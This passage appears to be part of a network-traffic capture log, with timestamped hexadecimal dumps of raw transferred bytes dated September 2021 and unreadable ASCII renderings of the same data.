d8 db b1 18 80
                                      Data Ascii: j K$FU-Y5e>-ipZL"_y3$<+>&W3QpR+TD.BCHpWc.~bZ\mdy*'!:3ci*4&EC'_bVe$wjTW,S(b(zIRzfTAh/6=d\Av
                                      2021-09-27 11:24:29 UTC50INData Raw: dd a7 1d 68 a9 bd f7 3a d4 5a aa d0 d2 6d 2d f1 83 92 94 21 8a da 44 d4 21 f9 1f c9 d6 49 09 c2 90 0c 59 c8 1b 7f 76 d4 44 fd 13 27 4b cb 46 5d c6 2c 3d 7f e6 d0 d3 ae a8 fd 34 d6 28 3e 48 06 07 7c 95 17 84 13 51 18 5a 93 af 18 66 35 46 59 05 29 7c e0 33 f9 53 53 cc ff 50 8e ba 67 e5 0b 22 ad bc e5 cd dd 14 05 75 5d e4 0d ad 25 cf be e5 d8 2f 3e b7 40 e5 31 43 4e 13 f6 26 85 ca 50 a6 c2 5b 61 bb 2e 74 9d 5e b4 bb ff a4 e2 8e 6c 43 8c 34 e5 fa 80 40 92 47 11 fa 82 90 cd 10 ef ba 5a 8a 38 68 05 dd d9 ee de 0e 4b 4e ae f4 1d 4c 67 78 39 cc c0 fc 46 fd 59 18 96 bd 8b ad e6 c7 29 99 10 37 d0 d6 5d a4 25 2c 5d 52 dd bb df 9f ab bc 07 0c 22 b8 e0 97 e9 9e 95 32 c8 8c 94 37 ac cc 1a cf 43 fa 26 00 1d c7 56 c1 75 68 65 08 18 2c 1d 5f 25 7b c9 48 d3 28 25 f2 5b c7
                                      Data Ascii: h:Zm-!D!IYvD'KF],=4(>H|QZf5FY)|3SSPg"u]%/>@1CN&P[a.t^lC4@GZ8hKNLgx9FY)7]%,]R"27C&Vuhe,_%{H(%[
                                      2021-09-27 11:24:29 UTC51INData Raw: d1 7c f5 19 02 74 f4 3c 85 9b f2 16 1a fc 22 ae ca 4f cb 07 b8 46 eb 35 aa 8d 9a e9 29 df 99 65 6d be 29 7d 75 2c 12 22 b9 05 d2 e6 2f b0 f6 fb 44 27 4b 41 45 3e d5 3e 4b 33 69 bd 0a 53 6d 16 18 b7 b3 fb 43 6f 5b 01 19 d9 4d 40 2c 4f 1b c4 75 8a 13 82 4f e8 70 de ac 35 9c 5e f8 60 5f 87 50 e8 da 78 cf b8 89 14 cd a1 43 25 13 1a 24 50 32 a8 1f 21 de 42 17 1f db 31 d7 4f 68 f2 94 da 6b b8 2b d6 93 6c d5 7f 85 28 c7 d7 cf f5 cb 37 7b e1 48 ee 5a aa 54 09 7e d1 28 32 c8 6a 7d 67 3d e4 43 de f0 89 7b 4d 44 e7 68 b0 ad eb 1a 1f ff 4c 12 5c 65 6d d7 eb 89 8e f3 11 d2 44 55 99 ac 06 9c aa 29 ec 0d a9 e3 5d dd b4 46 c9 45 51 f5 d2 98 1d 97 eb ff 0b 62 77 c4 d5 34 d8 ea 92 2e 08 aa 57 bb 14 c1 65 8f 49 90 6e c3 72 d8 87 34 fe aa b8 dc 2c b1 54 58 4a b4 80 12 1b 83
                                      Data Ascii: |t<"OF5)em)}u,"/D'KAE>>K3iSmCo[M@,OuOp5^`_PxC%$P2!B1Ohk+l(7{HZT~(2j}g=C{MDhL\emDU)]FEQbw4.WeInr4,TXJ
                                      2021-09-27 11:24:29 UTC52INData Raw: dd a8 e3 57 bc 94 a2 63 90 b3 f4 b5 5e 8f 95 34 c4 12 9b 25 a4 dc 01 57 e5 fb ea 3f 97 f8 56 ea 65 cd 65 16 24 d8 09 77 80 68 c0 31 e5 02 e1 f7 48 cb 28 9e de 9a 88 48 f8 d8 87 0d 1b 24 a9 10 1c 7a eb de 7b cb f6 3d a4 bc e4 0e a5 f1 cb 78 12 a3 45 b2 d0 19 85 1e 47 0d 9f 09 fd 2d 51 b4 a0 09 64 0b d4 f9 9e a4 89 d6 17 49 76 18 d9 12 b2 99 ae e8 d2 b6 c9 df 6a 74 02 98 02 8d 71 d7 c2 5d 55 42 39 be 35 cd c5 b3 a8 70 6b e6 67 4b 46 ba 84 a9 ee 04 ac 37 70 42 13 cb 3f 7f e3 c2 c7 9f bd 68 59 d8 ca 9a 92 80 4a 8d c7 3b 1c 72 89 47 18 be 30 ea 46 ec da cd 59 4c 48 2d 19 78 11 45 1d 7e d6 7d c0 56 bd 44 49 8c 94 1c 68 99 76 14 ef 29 7b f1 85 09 a8 04 c2 01 6d d4 a9 54 6c 93 fa 3e 8f 62 fb f8 3d 77 d9 b5 fc 92 53 a2 7a 66 83 e4 d8 48 c1 14 0b 3c af de 8a 16 ca
                                      Data Ascii: Wc^4%W?Vee$wh1H(H$z{=xEG-QdIvjtq]UB95pkgKF7pB?hYJ;rG0FYLH-xE~}VDIhv){mTl>b=wSzfH<
                                      2021-09-27 11:24:29 UTC54INData Raw: 3b 44 40 cc d0 b2 0c 92 b5 c7 f5 63 59 c6 fe 31 b6 ec 6d d1 bd a3 7d a8 84 c4 65 6b 5e 90 6e ac 72 d8 96 22 ed a0 80 0c 2b b1 54 58 98 bf 98 ec d3 ae 3d df fa e8 63 c0 02 57 84 58 9c e7 9c 6d 07 33 82 80 f3 c9 6c e8 b3 c5 39 8b b9 b9 c1 74 a9 87 62 97 12 d1 22 fd 1e 32 ff 7f ca dd ad 1a 72 ce 1d fe 12 1f 4a a6 c0 e9 ac 14 e4 88 ba 5f 31 86 c1 20 82 33 fd 1c cb d4 2f 91 5f 90 06 40 e5 1c 78 5b d7 8a 0f 02 20 66 dd 45 7e f4 46 3f 79 89 74 c3 a8 b5 0f bb c4 3b 3f 63 39 14 7a bd 89 8d 3b 99 37 5f 48 53 d9 65 35 51 4d 26 f1 82 e0 35 90 f6 df 93 f5 78 13 a9 74 fe 0b 3e a3 bb 69 d9 e6 ec 4f 74 5b 81 ac a0 34 c9 80 e3 d4 3e 38 b1 dc de 47 31 b8 14 e5 27 87 c6 69 5e d0 57 7d 4e b4 13 9c 54 96 48 08 a5 e8 9b 77 5f 9b 11 14 d1 43 45 83 44 2e 85 86 90 cb 39 0f ad 4b
                                      Data Ascii: ;D@cY1m}ek^nr"+TX=cWXm3l9tb"2rJ_1 3/_@x[ fE~F?yt;?c9z;7_HSe5QM&5xt>iOt[4>8G1'i^W}NTHw_CED.9K
                                      2021-09-27 11:24:29 UTC55INData Raw: 0e 77 be 8e 15 c3 26 4b fd 94 07 01 b2 fd a7 79 d4 a9 4b 5e 80 e8 3f 8d 40 e1 06 1c 5a d0 c6 34 92 53 b9 66 6f 97 ce 27 59 d3 0b 01 d3 a9 eb 72 3c 33 a7 1c a8 48 3e f5 28 09 70 9e 80 2a 09 89 4d c7 00 c9 13 69 c3 e5 92 fb be 01 0a 05 50 1a 21 50 a9 83 ea 1b 6a e7 d2 56 04 e3 1b 1e 63 d6 00 22 7f f8 3d 9e 65 e2 3f 03 0b 30 8c e7 4e da 1c a2 38 16 2a a6 79 84 d5 1c e1 9f 72 ea e2 2f 6a 1b d0 1d 33 bc 3b 18 dc b2 ab 98 bc de 27 4b 41 7e e3 cb 33 52 09 4d ac 18 46 70 f7 10 88 ab ea 59 7d cc a0 18 f5 43 45 21 31 dd d2 6a bd 99 49 53 83 34 c4 bf 3a 8f 45 e2 6d 45 6b 51 d5 c0 61 c8 90 82 27 cc a3 57 34 12 85 2f a5 2c 95 05 1b f0 51 05 06 cb d6 c5 66 71 f2 9b d3 fb 6e 95 f8 9b 63 d9 81 a6 37 cc ce dc b5 82 cc 9f e0 56 df 4c 93 4d 04 7f c9 d6 22 e1 78 92 62 39 5c
                                      Data Ascii: w&KyK^?@Z4Sfo'Yr<3H>(p*MiP!PjVc"=e?0N8*yr/j3;'KA~3RMFpY}CE!1jIS4:EmEkQa'W4/,Qfqnc7VLM"xb9\
                                      2021-09-27 11:24:29 UTC56INData Raw: 6e c4 2f 25 9e c7 09 cb cf a9 1b e1 f6 85 ca 50 a6 c2 44 45 82 fb ed 63 80 ab f1 20 92 e2 88 75 5d 8f 4a 4b d2 43 49 9f 69 3e 77 85 9a 13 13 fa 84 42 b4 2e 3f 95 e2 d9 ee df ac 5a 7b ba e0 09 a1 c6 78 39 20 d6 d4 85 eb 59 1e 81 2a 8c ad e7 dd 0a 8b 01 a1 c4 c1 d1 e1 25 2c 4d 83 76 ae cb 81 b5 bc ff 0c 22 b4 9b 5b 2b 9d 9f 27 db 7f af 37 ac c7 04 f1 7c ee 30 11 9d 86 6a c1 74 c0 5c 13 08 38 0f 18 36 7a c9 48 ca 09 8e 40 5a c1 33 87 ca 96 cf a9 f8 d8 8b 73 36 35 bf 00 1e 65 c2 c0 16 ef f4 2c b4 bc fb 85 bf 91 c5 74 16 a5 52 a9 f7 ec a2 1e 41 68 9d 04 f9 2b 89 90 a6 3c 64 0d f6 34 a7 a4 83 f4 55 49 67 1f dd c8 b0 98 d0 01 c2 b8 4d 7b 52 56 f1 08 34 53 64 f8 86 49 55 42 33 ad 39 be 6f f3 f3 52 f1 ce 5f 41 f1 a7 8c 26 fd 2e ab 1c 22 03 38 8d 2e 6f f2 c5 d6 b7
                                      Data Ascii: n/%PDEc u]JKCIi>wB.?Z{x9 Y*%,Mv"[+'7|0jt\86zH@Z3s65e,tRAh+<d4UIgM{RV4SdIUB39oR_A&."8.o
                                      2021-09-27 11:24:29 UTC57INData Raw: 13 80 16 0f 9f 6a 15 19 d1 2e d5 43 07 f6 90 c5 6b 98 25 df b3 52 cf a9 82 24 c6 ec f2 f5 da 38 be 1f 97 d7 7a a9 7a 15 6d de 3b 28 be c9 83 66 1b ea 7d ec ea 9a 74 93 57 e4 5d bc 79 ea 36 13 b7 69 16 62 20 92 28 14 2d 82 e0 14 96 55 50 8e ad 07 b0 a9 3e ff 08 a9 e8 58 cb 4b 47 e5 46 46 e0 d7 98 0c 98 f5 f3 f5 73 5a c6 fe 24 e0 ec 6d cb f7 a2 7c b3 14 c1 65 04 4a 90 6e d0 72 d8 87 51 57 a0 80 06 27 99 7a 5a 5b b8 94 9f 01 ae 3d d9 e4 c0 42 c4 18 51 ac 7a 87 d7 93 45 4d 36 82 86 ae ed 6c f9 ca 57 08 8b b3 b9 c5 86 ad af 45 9f 6c eb 0a de 14 3a 9a e7 e9 d9 a7 11 53 85 ac ff 18 7a 45 ab d6 fc 8c 2a 82 33 ba 5f 2a a0 d7 44 af 21 f9 1f b5 68 41 21 54 83 05 6b 02 0c 7d 76 c0 5e d2 bb 21 66 c6 53 52 68 67 3d 7f e0 d5 c7 af ae 23 48 7e 3a 35 7a 50 7b 7d 95 0c e3
                                      Data Ascii: j.Ck%R$8zzm;(f}tW]y6ib (-UP>XKGFFsZ$m|eJnrQW'zZ[=BQzEM6lWEl:SzE*3_*D!hA!Tk}v^!fSRhg=#H~:5zP{}
                                      2021-09-27 11:24:29 UTC59INData Raw: a1 94 b5 cd a5 b9 47 62 58 34 db 66 fd 59 77 f4 fb 6c 41 6a 1b a9 39 b8 68 3e af 7a 60 cf 4c 43 57 b8 4c d5 8c 2e ab 19 93 1f 1b df 2b 57 2b c3 c1 95 ac 6e 56 f0 e3 9e b3 86 5d 00 d4 3b 1c 73 80 4f 09 b7 26 fd ca 67 85 cd 58 ee f0 25 0d 6c 31 8c 1c 7e d0 6c c6 42 8f 6e 4d 8d 92 0b e5 9e 70 14 ee 3a 52 e1 8d 1f f1 60 c2 01 7c 76 b8 5c 62 87 d2 f7 9d 52 f2 e9 1b 62 f1 9e 8a 92 55 a4 e1 72 84 dc 26 5b c9 05 03 3b bf 4b f8 17 e6 b9 b5 aa 52 2a f0 12 de 52 60 8b 17 02 8c 6d fa 01 a6 33 7d 4e e4 8d df ac 07 1e 00 6a a6 03 ae a2 db 6a 0a 62 f7 c7 3c 31 e4 12 0e 75 7b a4 5f 53 e8 2f 8a 97 cb 84 04 02 29 8a 97 51 c8 0e a8 3a 00 24 ae af 19 f9 01 fa 93 bb 76 98 07 5d 1a c3 18 31 b4 39 0c cf 17 ba 97 d9 49 26 4c 61 6d ea d5 2e 41 1b 4d bd 1f 59 bf fa 11 b5 ac fb 52
                                      Data Ascii: GbX4fYwlAj9h>z`LCWL.+W+nV];sO&gX%l1~lBnMp:R`|v\bRbUr&[;KR*R`m3}Njjb<1u{_S/)Q:$v]19I&Lam.AMYR
                                      2021-09-27 11:24:29 UTC60INData Raw: 08 c9 d4 2b 1e 4f d3 17 da d6 47 30 56 ff 19 52 e0 07 a3 23 a1 75 f8 02 26 75 c5 51 5f 33 12 3d 7f e0 a9 ea aa bf 21 36 cd 2a 32 1f 1b 07 7c 93 17 85 2a 96 33 58 94 87 df 0a 13 42 48 08 10 88 c8 70 fb 44 d8 fc d5 52 8f af 73 e5 11 5b a7 b0 78 d6 10 6e 69 5c 6a ee 1e ab 27 c9 db c5 d4 3e 38 ac f2 ce 34 30 b2 cc f4 27 bc cb 6b af d3 57 3a 3d 06 12 9c 5e be d4 1a a5 e2 88 69 4f 9d 39 d9 d3 43 43 87 41 06 77 9f 90 cd 10 ef 9e 4f 9e 1a 7f 89 e2 58 ee df bd 4c 49 b1 d8 9b 64 c4 78 39 d7 df cd 7b ff 75 17 a9 1e 8e ad e0 ec 20 9f 0a 22 d7 ca c9 65 24 00 52 f2 a3 67 cb 8b b5 8e f9 1a 0c a4 ed ac 21 9d 84 3f c8 ff 92 1b af d5 1a d2 52 fd 3b 0d 6f f9 7a 82 54 ca 70 1e 0c b5 22 77 86 7a c3 54 cb 16 ec c9 c9 c1 39 94 d9 8c a7 80 eb d1 83 6b 5c c7 a8 16 07 63 f2 dc 03
                                      Data Ascii: +OG0VR#u&uQ_3=!6*2|*3XBHpDRs[xni\j'>840'kW:=^iO9CCAwOXLIdx9{u "e$Rg!?R;ozTp"wzT9k\c
                                      2021-09-27 11:24:29 UTC61INData Raw: f9 a2 29 04 b1 aa 87 94 ef 12 f6 a0 af 67 bd 2f 6a 0b c5 09 dc b2 01 0b f6 2b d5 5e d3 97 2c 58 4e 71 f9 d2 3e 50 1d 55 43 0b 75 68 21 3f a6 b6 fd 59 73 52 f9 18 e4 44 4f d0 21 fe c2 77 93 00 42 4f ea 7d d4 b9 2a 62 4e d1 7a 40 74 4a d7 d4 7e c9 68 9c 02 39 b3 6a 2d 0b 08 ea a3 2c 8e 05 0f f0 51 11 07 29 29 e8 57 6f eb b9 27 60 46 20 e2 fa 4d 1c a8 88 3d e4 10 cb f5 d0 1a 44 1f 49 c8 54 9e 44 06 6b d4 39 25 d0 8d 82 4a 1d f0 51 dd 85 7b 7f 4d 5f ee 69 a8 55 ea 27 15 ea a3 17 4e 25 b9 3f 09 85 84 e0 05 d4 42 ae 8f 7e 04 a8 ba 37 ff 19 af ed 52 35 4b 6b ec 4f 57 e3 e5 56 13 99 e7 f5 f5 72 5d d0 00 30 cc ef 7a c2 f1 a2 6c ae 3b ce 9b 6a 64 92 45 a9 4a e9 69 dd 12 88 c7 0d 2d bb 7c 1f 5a be 92 eb 32 c9 3c df e5 87 75 c1 18 5d ac 3f 86 d7 93 02 79 33 82 8a ac
                                      Data Ascii: )g/j+^,XNq>PUCuh!?YsRDO!wBO}*bNz@tJ~h9j-,Q))Wo'`F M=DITDk9%JQ{M_iU'N%?B~7R5KkOWVr]0zl;jdEJi-|Z2<u]?y3
                                      2021-09-27 11:24:29 UTC63INData Raw: 17 2c cd 09 d9 ce fd 37 08 8e ee ca d0 73 d5 54 3e f3 38 09 77 1a 6a ce 5d e6 16 7d e0 5c de 1b 82 53 8e a7 89 db ce 1d 73 34 39 8d 36 8d 70 fa d5 88 fe f3 22 87 bb 72 0e ab 81 cb 5a 92 a5 54 b8 64 d5 81 01 66 74 29 1a fa 34 a7 98 08 3e 64 0b 42 c0 a1 bb a0 fc 49 49 67 15 52 d5 a6 8b 95 f3 5f a9 40 77 7e 51 61 76 fa 4c 48 e4 76 7b 52 5d 1e 8d b9 be 7f b3 34 6b 67 d1 71 6b b9 b0 5a ab 74 3f ac 02 1e 18 8f da 38 60 d3 e2 41 9f bd 68 de c9 cd 85 82 96 d6 9c d4 24 2e 52 6c 47 18 bf ac fb 41 f3 b6 db c5 5d e6 32 2d 58 99 44 1d 7e 46 6c c7 49 92 64 c9 8d 94 1c f4 88 77 0b d9 09 da f0 85 09 13 14 c5 1e 4f c2 35 45 71 8c c2 20 c9 ce e9 ff 02 4f c6 db 12 83 54 ac 56 6a e5 40 36 4f de 2f 14 4f 34 d6 73 08 da a7 7b 27 4b 39 fb 07 09 36 fc 90 01 1b a6 5a f6 99 b7 32
                                      Data Ascii: ,7sT>8wj]}\Ss496p"rZTdft)4>dBIIgR_@w~QavLHv{R]4kgqkZt?8`Ah$.RlGA]2-XD~FlIdwO5Eq OTVj@6O/O4s{'K96Z2
                                      2021-09-27 11:24:29 UTC64INData Raw: d1 fd b6 83 a9 32 3b 64 0b 17 a9 78 ae 72 d8 e5 00 ef a0 86 1f 27 ab d9 4d 5b be 99 ff 00 be 27 c9 c7 b3 67 c0 1e f5 95 43 90 ff c5 69 6f 34 20 91 9c d1 44 a4 c4 7f 3f 29 a2 a9 f0 b2 f4 83 64 9d ce fc 38 ee 1d 12 be cd cb db b4 10 6a a8 bf ea 04 06 4d 81 e7 eb b2 3d e5 13 a9 52 31 8f c1 26 77 92 f8 15 d0 fc 59 30 5b 81 01 3c 52 0c 7d 7c a6 45 fa 02 3b 75 c0 51 5a 33 bc 3f 7f e0 d5 c5 b9 ab 30 f1 d7 2f 24 64 2e 10 f2 22 34 4b 2a 96 33 00 91 87 df 0a 87 41 48 04 29 90 e0 33 f5 57 d6 82 f7 3f fc a8 74 fe c8 21 b2 b1 79 f4 da 7b 4c 7e 6e fd 0f ab 25 cb 80 e3 d4 3e 38 cf fe f4 34 36 80 a8 f6 20 96 d2 47 bb fb d3 79 21 00 05 11 59 be d4 09 b6 f4 99 69 58 8c 31 d9 c3 43 43 98 e3 17 61 96 87 dc 06 e8 ba 5c 13 01 7e 89 e3 ca f6 ce b4 4c 4d 26 f1 11 4c 67 78 39 cc
                                      Data Ascii: 2;dxr'M['gCio4 D?)d8jM=R1&wY0[<R}|E;uQZ3?0/$d."4K*3AH)3W?t!y{L~n%>846 Gy!YiX1CCa\~LM&Lgx9
                                      2021-09-27 11:24:29 UTC65INData Raw: 76 93 fb 17 24 52 f8 f2 35 2c d9 b5 84 85 85 3e 47 75 84 dd 34 46 d7 07 06 3b bb d4 5c 39 e4 b8 11 a8 55 28 f7 2e 65 71 62 81 00 17 88 54 c7 11 8e 5e 6f c3 e5 94 52 aa 13 0a 15 51 27 12 8c be be e9 22 73 f6 d4 33 82 f0 39 0f 6a 79 2c 30 7f e8 8d 91 b9 fb 02 16 2a 32 82 f8 4d 6b 1f 80 3a 27 24 89 93 91 e0 8c df 98 65 66 ae 0b 7b 3e d5 05 be a2 09 10 f1 b3 ab b3 cb 80 ba 5a 6f 7a c2 73 3e 41 11 6b ac 2e 4f f1 25 1a b5 95 ed c8 42 50 ff 18 ff 51 58 3f 04 ca 54 59 8b 15 7b 44 76 55 d4 bf 30 96 5c ef 6e 47 6d 79 47 d0 7e de 78 0e 0c c7 b2 47 31 16 0b 2b 86 94 84 16 03 d6 51 06 0d ff 44 c0 4a 6e f5 1c c2 61 46 2b ee 8f 71 d8 81 2f 37 cc ce ec e4 d4 25 ed 18 49 c2 5e 92 6e 04 4e c2 3e af f2 73 83 67 b3 f0 76 c0 c2 37 7e 4d 5f c2 a7 bb 53 ea ba 2c f6 5d 17 74 08
                                      Data Ascii: v$R5,>Gu4F;\9U(.eqbT^oRQ'"s39jy,0*2Mk:'$ef{>Zozs>Ak.O%BPQX?TY{DvU0\nGmyG~xG1+QDJnaF+q/7%I^nN>sgv7~M_S,]t
                                      2021-09-27 11:24:29 UTC66INData Raw: b8 f9 39 b8 0b 09 8b 11 cb 3f 6e ec ea 8f 9b bd 6e 2d c1 cb 9a b9 ad 5b 9c dc 13 4c 76 93 41 77 a6 31 ea 4c d5 41 cd 59 4c f0 3b 06 71 cf 57 05 6f ce 6b f3 07 b6 52 51 5b 87 04 43 d0 61 04 fc 0e 4b d7 94 2e e0 26 c0 01 7e c5 a7 43 fb 94 fa 3f 9d 41 da e9 3f 60 c8 ad 02 ad 53 b3 6d d7 95 fe 33 60 6c 14 0b 27 80 9d 74 17 ec 90 fd ba 5a 34 cc ee 17 53 6a a9 22 04 98 4f b9 21 a4 35 6d d2 fb 9a 09 be 0b 1b 1a 55 88 04 ae a8 ae f4 2c 73 d0 c2 28 38 6d 24 18 7c f4 b1 21 59 fd 07 2d 9b e3 19 1b 22 af bd f8 47 c8 18 8a 9f 04 35 a0 ab aa e8 0f e7 15 62 67 bd 2e 79 39 d2 31 34 a2 35 8b d8 2f ba 96 71 86 05 5f 63 c0 ea d4 34 5e 64 c1 82 0a 59 60 1f 39 56 b7 fb 58 50 1d 00 e7 0a 55 45 23 31 ca d7 63 b8 a6 59 5c ec 6c c8 86 ab 9d 4f fd 6e 45 40 c5 c5 d2 7e c9 61 ab 9c
                                      Data Ascii: 9?nn-[LvAw1LAYL;qWokRQ[CaK.&~C?A?`Sm3`l'tZ4Sj"O!5mU,s(8m$|!Y-"G5bg.y9145/q_c4^dY`9VXPUE#1cY\lOnE@~a
                                      2021-09-27 11:24:29 UTC67INData Raw: d1 a6 ae 29 36 d6 0a 9d ae 30 20 54 a2 06 8c 31 80 14 72 ad 87 d9 6f eb 40 4e 24 01 c0 fc 33 ff 44 de 93 ff 56 8f a9 74 e4 1a 34 b2 a7 7a dc ce 74 4c 74 5d f4 1e a1 35 d8 98 7c d4 12 32 a0 da ec 34 30 a9 10 f5 08 e2 c3 41 a5 d6 40 ad bb 0d 15 98 76 ca d4 08 af f4 12 75 90 8f 11 c6 d2 43 49 ba 6f 04 77 83 9a e5 29 fc ae 41 40 2e 78 a3 e3 c9 ee df ac 5a 5a ba f8 11 64 d6 62 39 c6 d5 c7 b5 fc 59 37 81 30 8c a8 e6 c6 2b 9a 0a 09 dd c1 d6 8c db 2d 70 f2 d4 a5 cb 8c a9 6a a5 20 20 a5 ff bf 2d 85 6b 35 f3 03 b8 35 87 2e 0b da 3d 71 30 17 9b d2 56 c1 74 d1 44 1b 0c 80 08 77 86 f6 c9 42 d6 28 cf f3 5b c7 32 e7 75 9f a0 9c f2 c7 9b 4a 88 26 a9 1c 1e 75 d2 fb 16 ef f2 31 8a 83 ec 1f aa 8d e9 6b 17 8d 20 bc f8 c2 ae 3a 41 62 bf 23 cc 2b 8f b2 a4 2e 75 0e f6 a5 a2 a4
                                      Data Ascii: )60 T1ro@N$3DVt4ztLt]5|240A@vuCIow)A@.xZZdb9Y70+-pj -k55.=q0VtDwB([2uJ&u1k :Ab#+.u
                                      2021-09-27 11:24:29 UTC68INData Raw: c1 3e 41 1b 57 bd 0a 58 7a 39 17 a4 d7 fb 52 6a d1 ff 18 e4 31 37 2f 20 d8 c9 7c ef f1 59 5c e6 6e c3 bd 18 fa 4e fd 75 45 7c 40 c2 c3 7b ce 7f 86 85 70 dd b0 24 02 15 37 a9 24 5e 01 df 7d 1f 17 19 d6 24 d5 4c 79 e6 87 d4 64 c8 9d f2 8d 0a 38 a8 88 3d ea cc b9 0d db 32 6a 0c 4d d3 5b 8b 93 04 48 fc 1f 23 cd 79 90 61 05 eb 7d ec ea 9a 74 93 55 e4 5d bb 53 ea 37 03 f6 5d 16 62 20 92 66 5a 96 93 fa 14 d2 54 43 be 50 07 82 a9 31 ff 99 a9 f2 49 dd 41 6c fe 46 41 f1 29 99 20 90 ec f8 f5 64 4d 38 ff 1d e2 fb 66 d1 f0 ba 83 a9 08 c7 4e 69 63 73 46 3b 72 d8 9c 20 c5 c6 81 0c 27 de 42 59 5b b4 b2 ec 1a b4 0d dc ef 2e 62 c0 18 c5 84 59 96 a4 23 6d 6f 38 88 a8 a8 cb 6c ff d3 7b 11 a5 b1 b3 ef 96 d9 9c 65 9b 6a e6 0a dc 10 3a 96 e7 e8 dd a7 1d 53 d9 a8 ff 14 3d 7d aa
                                      Data Ascii: >AWXz9Rj17/ |Y\nNuE|@{p$7$^}$Lyd8=2jM[H#ya}tU]S7]b fZTCP1IAlFA) dM8fNicsF;r 'BY[.bY#mo8l{ej:S=}
                                      2021-09-27 11:24:29 UTC70INData Raw: a0 9c f0 f0 09 66 33 20 81 9f 09 70 fc fd 83 ec f4 3b d1 51 ef 1f a6 f1 10 7b 12 af 42 b0 97 3a 87 1e 4b 75 6f 18 ef 38 8b 80 af 3f 64 0b a0 2e a7 a4 83 d4 d8 4d 08 15 cc c4 ab ef be e7 c3 b2 28 d8 54 47 f7 74 fa 42 63 df c8 14 69 42 33 a7 31 af 7b dc a8 78 60 c4 24 4a 44 b0 50 c4 58 2f ab 17 22 09 02 cc 12 7a db 20 c1 9f bd 7e cf f3 ca 9a b2 93 4f 9c d4 33 0d 76 fc 47 1a bf 3a 91 44 ee 85 c7 36 fe e0 2d 13 50 08 44 1d 74 c9 7b d1 50 8a 41 94 3b 94 1c 68 88 76 7b 9c 28 5a fa 55 1c 8f 05 c3 29 6c d4 a9 5e 45 83 eb 39 b4 ce f8 f8 17 5e d0 b4 8e 94 40 b6 47 7c 95 da 53 5a c1 14 10 3e ad d6 71 3f ee b9 17 bd 49 36 f5 32 3e cf 60 81 0c 2c 17 44 d6 0f 8b 50 18 e1 e1 8d d9 be 1a 1b 1d 4a 14 07 c1 a8 ad e7 00 19 f5 d6 39 2a 8e 31 1a 7c f3 02 39 6e e1 3b a8 11 e7
                                      Data Ascii: f3 p;Q{B:Kuo8?d.M(TGtBciB31{x`$JDPX/"z ~O3vG:D6-PDt{PA;hv{(ZU)l^E9^@G|SZ>q?I62>`,DPJ9*1|9n;
                                      2021-09-27 11:24:29 UTC71INData Raw: 9d c1 34 5e 95 5e 91 c8 8e f1 75 21 8a 80 97 c1 77 07 c1 53 30 9a b4 ab f6 f1 36 9b 77 93 6c fc 2a e2 04 c4 91 e3 c1 cc a1 00 ad b2 aa e0 03 06 51 aa c7 f2 ba d2 f0 a5 b3 4e 27 90 cf 08 84 3e ea 1d da c1 48 3e 57 6e 0d 7f ea 1c 7a 6a cd 0f 66 1d 2a 75 c4 40 47 13 5a 30 81 e7 ea 9a b9 bb 36 21 cd 2a 33 e1 28 5a 61 f7 0f 9d 3d 02 03 05 8e e5 b9 6c 24 46 d9 14 5e 98 82 53 f6 55 d8 02 e1 0f 98 cb 14 fd 09 32 23 ae 68 83 d9 18 2c 7d 4c e8 8f be 14 9c b1 1c b4 37 23 a6 4b e9 74 6f a3 71 96 29 87 c5 d0 8f 53 57 7b 21 59 0f ff 3e 0a 48 17 b5 f1 80 7f 5f 95 26 e5 2c 42 6f 99 49 11 18 af 91 cd 1b e3 bb 58 96 2e 6f 81 fd c8 10 de 80 53 4b bc fd 38 e2 db 6a 2a ce d4 c5 8d e6 a7 1f ad 3b 92 20 cd c6 3a 8d 12 25 df d2 d9 9b 34 24 42 0e cd 82 c1 9a b8 8f bb 42 be ad fd
                                      Data Ascii: 4^^u!wS06wl*QN'>H>Wnzjf*u@GZ06!*3(Za=l$F^SU2#h,}L7#Ktoq)SW{!Y>H_&,BoIX.oSK8j*; :%4$BB
                                      2021-09-27 11:24:29 UTC72INData Raw: 3f f0 2e 02 7b c3 81 06 0e b0 d9 d6 05 ac 26 60 d2 eb 99 f7 35 17 0a 12 54 88 04 ae a8 ae f3 1e 76 de 77 39 20 eb 0f 30 aa f6 13 36 69 64 28 80 9b e2 07 10 16 0b 21 f8 47 c3 26 3e 29 04 3f 82 1e 81 f9 07 d8 97 64 67 bb 3c 60 0b c8 3a ad b2 2d 0d ca 10 ab 9d fb 18 27 4b 41 40 dc a7 1c 43 1b 4b ae 06 48 6d 21 86 a0 b6 fd 3d 40 43 ff 1e e4 4e 47 25 4f f6 c6 75 86 15 54 4d e6 12 e3 bd 30 9a 5e f1 6e 5f 16 79 c6 d2 78 de 7f 8f 64 d2 b3 46 2f dc 10 19 86 04 84 16 03 e3 4d 3f 21 d7 28 ce 94 68 f2 94 d2 b7 55 2f eb 9e 74 c0 97 23 c9 33 3b 14 e4 ff 1a 57 1f 49 c8 4c 8f 4b 18 45 ec 28 23 c7 ad 81 60 3b e8 7f d4 ea db 4a 4d 55 e2 77 bb 53 60 36 13 f6 6a 17 62 20 53 29 14 96 8d e0 14 d2 4f 50 8e 53 07 b0 a9 31 b4 08 a9 f2 ce ca 4a 47 04 47 46 e6 c6 98 0c 92 ee f3 f5
                                      Data Ascii: ?.{&`5Tvw9 06id(!G&>)?dg<`:-'KA@CKHm!=@CNG%OuTM0^n_yxdF/M?!(hU/t#3;WILKE(#`;JMUwS`6jb S)OPS1JGGF
                                      2021-09-27 11:24:29 UTC73INData Raw: fd d2 ce 5d ac 5a 5a 26 f1 07 7b c8 58 cd c6 d4 d4 19 ef 57 01 8c 2f e7 31 f7 c8 25 82 1e 6e 5a d0 df 84 2a 0c b7 f0 cc ae 57 9a b1 87 a1 0b 51 3f f5 bf 2c 8e 91 ea cb 24 bb 00 ac cd 03 ca 54 ea 3c 3f a9 f8 56 cb a9 0d 74 1e 0c 29 0d 5f d2 7f c9 44 a8 87 e0 f1 5d d7 c7 95 de 9b cf 1e f9 d8 87 74 cd 24 bf e8 0c 10 d6 d7 12 c5 e2 2c a6 c2 66 1e ac 98 fa a0 01 aa 47 b1 c0 4c 86 1e 41 73 b1 1a f4 03 12 bc 88 38 0b 81 df d1 a0 b7 81 cd cd 58 6e 3d 38 c7 a1 92 d0 6f c2 b8 41 7b 58 56 f9 76 f4 7b fa f6 ea 6c 3a c8 32 ad 3f ad 78 c0 a0 78 60 c8 4c 47 6e 27 5a ab e2 3f a7 0c 36 26 75 ca 3f 75 ea d3 c4 f0 b7 6a 42 de a5 8c b2 80 40 9e d9 48 3e 70 93 41 0b b4 21 e1 6e 73 81 cd 5f 23 cb 2f 19 